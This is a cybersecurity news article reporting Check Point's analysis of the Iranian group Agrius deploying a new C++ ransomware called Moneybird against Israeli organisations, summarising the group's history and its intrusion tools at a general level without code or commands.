Skip to content

Iranian hackers are attacking Israeli organisations with Moneybird Ransomware

  • by
  • 3 min read

Iranian threat actor group called Agrius is using a new ransomware strain dubbed Moneybird in attacks targeting Israeli organisations. Also called Pink Sandstorm, the threat group is known for carrying data-wiping attacks disguised as ransomware infections on Israeli targets in the past. 

The strain was discovered by Check Point researchers while responding to a ransomware attack against an Israeli organisation. While the researchers say that the payload itself was unique, the techniques, tactics and procedures used in the attack were similar to that of Agrius, with the data eventually being leaked by an entity with one of the group’s known aliases. 

The group has been active since at least December 2020 and has been attributed to Iran’s Ministry of Intelligence and Security (MOIS) by Microsoft. It previously used a makeshift ransomware called Apostle that was previously a .NET-based data wiper. However, Moneybird is coded in C++, suggesting that the group is capable of expanding its capabilities and developing new tools. 

As for the attack vector itself, Agrius first exploits vulnerabilities within public-facing web servers, which then leads to the deployment of several unique variants of ASPXSpy web shells. After this, exploitation and post-exploitation activities are carried out using public VPN service nodes (often ProtonVPN) in Israel. 

Once the web shells are deployed, a suite of further tools is deployed for recon, and lateral movement within the target network as well as to harvest data and extract any credentials. These include:

  • SoftPerfect Network Scanner to scan for internal networks.
  • Plink to tunnel traffic from a VPS owned by the attacker.
  • ProcDump to dump LSASS and harvest credentials.
  • FileZilla to extract compressed files. 
A Moneybird ransom note. | Source: Check Point Research

That said, the researchers pointed out that most of the activity carried out by the threat actors was done manually over RDP. Some of the payloads were even downloaded by the threat actor opening a browser and connecting to legitimate file-sharing services that hosted the payloads, one of which was the executable file for Moneybird itself. 

The ransomware itself doesn’t have any command-line parsing abilities and includes a configuration file embedded within the tool itself, making it less suitable for mass campaigns that often target different environments. 

In the News: Google Play Games is coming to PC in Europe and New Zealand


Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: [email protected]